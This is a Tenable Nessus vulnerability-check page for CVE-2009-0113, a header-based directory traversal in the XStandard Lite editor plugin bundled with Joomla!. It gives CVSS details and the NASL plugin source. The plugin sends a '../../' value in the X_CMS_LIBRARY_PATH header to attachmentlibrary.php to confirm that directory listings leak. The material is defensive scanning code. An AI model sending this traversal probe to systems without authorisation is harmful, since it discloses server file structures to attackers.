
XStandard Lite Plugin for Joomla! X_CMS_LIBRARY_PATH Header Directory Traversal

2009-01-08 00:00:00
This script is Copyright (C) 2009-2024 Tenable Network Security, Inc.

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

6.4 Medium

AI Score

Confidence

Low

0.031 Low

EPSS

Percentile

91.1%

The version of Joomla! running on the remote host is distributed with a WYSIWYG editor plugin known as XStandard Lite. This plugin is affected by an information disclosure vulnerability in the attachmentlibrary.php script due to improper sanitization of user-supplied input to the X_CMS_LIBRARY_PATH request header before returning a listing of directories and certain types of files (txt, zip, pdf, doc, rtf, tar, ppt, xls, xml, xsl, xslt, swf, gif, jpeg, jpg, png, and bmp by default). Regardless of whether this plugin has been configured for use with the Joomla! installation, an unauthenticated, remote attacker can exploit this vulnerability, via a specially crafted directory traversal sequence, to disclose the directory trees on the remote host, subject to the privileges of the web server user ID.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  # Registration branch: when Nessus loads the plugin for its metadata this
  # block runs and exits, so nothing below line 135 touches the network.
  script_id(35321);
  script_version("1.22");
  script_set_attribute(attribute:"plugin_modification_date", value:"2024/06/05");

  # External references for the flaw being checked.
  script_cve_id("CVE-2009-0113");
  script_bugtraq_id(33143);
  script_xref(name:"EDB-ID", value:"7691");
  script_xref(name:"SECUNIA", value:"33377");

  script_name(english:"XStandard Lite Plugin for Joomla! X_CMS_LIBRARY_PATH Header Directory Traversal");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by
an information disclosure vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of Joomla! running on the remote host is distributed with
a WYSIWYG editor plugin known as XStandard Lite. This plugin is
affected by an information disclosure vulnerability in the
attachmentlibrary.php script due to improper sanitization of
user-supplied input to the X_CMS_LIBRARY_PATH request header before
returning a listing of directories and certain types of files (txt,
zip, pdf, doc, rtf, tar, ppt, xls, xml, xsl, xslt, swf, gif, jpeg,
jpg, png, and bmp by default). Regardless of whether this plugin has
been configured for use with the Joomla! installation, an
unauthenticated, remote attacker can exploit this vulnerability, via a
specially crafted directory traversal sequence, to disclose the
directory trees on the remote host, subject to the privileges of the
web server user ID.");
  # https://www.joomla.org/announcements/release-news/5226-joomla-159-security-release-now-available.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?11fb9abc");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Joomla! version 1.5.9 or later");
  # Confidentiality-only impact (C:P / C:L): the flaw leaks listings, it does
  # not modify data or affect availability.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:U/RC:ND");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:U/RC:X");

  # The check below actively sends the traversal header, hence
  # exploited_by_nessus is true and the category is ACT_ATTACK.
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  # CWE-22: Improper Limitation of a Pathname to a Restricted Directory.
  script_cwe_id(22);

  script_set_attribute(attribute:"vuln_publication_date", value:"2009/01/07");
  script_set_attribute(attribute:"patch_publication_date", value:"2009/01/10");
  script_set_attribute(attribute:"plugin_publication_date", value:"2009/01/08");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:joomla:joomla\!");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_set_attribute(attribute:"enable_cgi_scanning", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2009-2024 Tenable Network Security, Inc.");

  # Only run after joomla_detect.nasl has recorded an install and PHP has
  # been seen on the web server; honour the global CGI-scanning opt-out.
  script_dependencies("joomla_detect.nasl");
  script_require_keys("installed_sw/Joomla!", "www/PHP");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");

app = "Joomla!";
get_install_count(app_name:app, exit_if_zero:TRUE);

port = get_http_port(default:80, php:TRUE);
install = get_single_install(app_name:app, port:port);
dir = install['path'];
install_url = build_url(port:port, qs:dir);

# Library path the plugin resolves relative to Joomla's 'images/stories'
# directory; two levels up is the Joomla! root.
target_dir = "../../";

# The affected script. The path is passed in a request header rather than
# in the URL, so the probe is a plain GET with one extra header.
script_path = "/plugins/editors/xstandard/attachmentlibrary.php";

res = http_send_recv3(
  method       : "GET",
  port         : port,
  item         : dir + script_path,
  add_headers  : make_array("X_CMS_LIBRARY_PATH", target_dir),
  exit_on_fail : TRUE
);
body = res[2];

# Evidence the listing was produced. Precedence is kept exactly as the
# original expression ((A && B) || C || D): a container listing that echoes
# target_dir is sufficient, and so is a <baseURL> naming one of Joomla's
# well-known subdirectories on its own.
listing_echoes_target =
  '<library><containers><container><objectName>' >< body &&
  '<path>' + target_dir + '</path>' >< body;
baseurl_shows_root =
  '/administrator/</baseURL>' >< body ||
  '/components/</baseURL>' >< body;

if (!listing_echoes_target && !baseurl_shows_root)
  audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);

# The response is one long line of XML; insert newlines and indentation so
# the report is readable. The catch-all rule must stay last, otherwise it
# would consume the tags the specific rules indent differently.
info = body;
info = ereg_replace(pattern:"><(/?library)>", replace:'>\n  <\\1>', string:info);
info = ereg_replace(pattern:"><(/?containers)>", replace:'>\n  <\\1>', string:info);
info = ereg_replace(pattern:"><(container)>", replace:'>\n    <\\1>', string:info);
info = ereg_replace(pattern:"><(/container)>", replace:'>\n    <\\1>', string:info);
info = ereg_replace(pattern:"><([^>]+)>", replace:'>\n      <\\1>', string:info);

security_report_v4(
  port     : port,
  severity : SECURITY_WARNING,
  generic  : TRUE,
  request  : make_list(http_last_sent_request()),
  output   : chomp(info)
);
exit(0);